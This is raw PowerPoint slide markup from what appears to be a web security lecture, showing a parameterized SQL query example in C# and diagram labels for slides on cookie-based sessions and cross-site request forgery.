              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	"SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE 	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dbConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.Parameters.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", Request[“user”] ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.Parameters.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", Request[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”] ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="150000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In PHP:    bound parameters  --  similar function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F349269-159F-478B-A6FC-B0A04D180025}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102405" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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dirty="0" smtClean="0"/>
              <a:t>Recall: session using cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="2286000"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="2286000"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6388100" y="1785938"/>
            <a:ext cx="1046163" cy="45720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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1319213" y="1785938"/>
            <a:ext cx="1271587" cy="45720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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89095" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2438400"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89096" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="3416300" y="2209800"/>
            <a:ext cx="2146300" cy="45720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POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89097" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="4943475"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89098" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="3581400"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89099" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="5791200"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89100" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="2651125" y="3276600"/>
            <a:ext cx="3565525" cy="45720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Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89101" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="3168650" y="4608513"/>
            <a:ext cx="2613025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89102" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3856038" y="5591175"/>
            <a:ext cx="1195387" cy="40005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response</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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Basic picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1CB60230-26B2-4122-A0D0-AB77677FE647}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2874963"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79877" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5951538" y="1855788"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79878" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="5173663"/>
            <a:ext cx="2436813" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90119" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5713413" y="4792663"/>
            <a:ext cx="1693862" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90120" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5554663" y="1428750"/>
            <a:ext cx="1760537" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79881" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="617538"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90122" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
